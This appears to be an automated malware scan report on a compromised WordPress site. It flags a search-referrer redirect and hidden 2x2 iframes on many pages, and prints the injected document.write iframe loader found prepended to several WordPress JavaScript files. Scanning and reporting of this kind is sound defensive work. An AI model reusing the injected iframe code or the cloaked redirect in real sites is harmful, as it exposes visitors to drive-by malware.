Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://68deals.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: 68deals.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 17:58:29 GMT Location: http://reddeerhotyoga.ca/aeed.html?h=3386839 Server: nginx/1.6.2 Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://68deals.com/ | 200 OK Content-Length: 7000 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 94050 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839></iframe>');
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if( Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839> | ||
http://68deals.com/wp-content/themes/twentyeleven/js/showcase.js?ver=2011-04-28 | 200 OK Content-Length: 473 Content-Type: application/javascript | clean |
http://68deals.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 948 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839> | ||
http://68deals.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117 | 200 OK Content-Length: 12662 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839></iframe>');
if ( typeof tb_pathToImage != 'string' ) { var tb_pathToImage = thickboxL10n.loadingAnimation; } if ( typeof tb_closeImage != 'string' ) { var tb_closeImage = thickboxL10n.closeImage; } jQuery(document).ready(function(){ tb_init('a.thickbox, area.thickbox, input.thickbox'); imgLoader = var h = window.innerHeight || self.innerHeight || (de&&de.clientHeight) || document.body.clientHeight; arrayPageSize = [w,h]; return arrayPageSize; } function tb_detectMacXFF() { var userAgent = navigator.userAgent.toLowerCase(); if (userAgent.indexOf('mac') != -1 && userAgent.indexOf('firefox')!=-1) { return true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=3386839> | ||
http://68deals.com/sample-page | 200 OK Content-Length: 7872 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 22 Sep 2014 17:58:37 GMT Pragma: no-cache Location: http://68deals.com/wp-login.php?redirect_to=http%3A%2F%2F68deals.com%2Fwp-admin%2F&reauth=1 Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 22 Sep 2014 17:58:37 GMT | clean |
http://68deals.com/wp-login.php?redirect_to=http%3a%2f%2f68deals.com%2fwp-admin%2f&reauth=1 | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://68deals.com/test404page.js | 404 Not Found Content-Length: 5885 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/hello-world | 200 OK Content-Length: 9297 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/author/travelbug | 200 OK Content-Length: 8396 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/author/ | 404 Not Found Content-Length: 5885 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/category/uncategorized | 200 OK Content-Length: 8314 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/category/ | 404 Not Found Content-Length: 5885 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/2012/05 | 200 OK Content-Length: 8116 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> | ||
http://68deals.com/2012/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Sep 2014 17:58:50 GMT Location: http://68deals.com/2012 Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://68deals.com/xmlrpc.php | clean |
http://68deals.com/2012 | 200 OK Content-Length: 8105 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?i=3386839 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?i=3386839> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=68deals.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://68deals.com/
Result: 68deals.com is not infected or malware details are not published yet.
Result: 68deals.com is not infected or malware details are not published yet.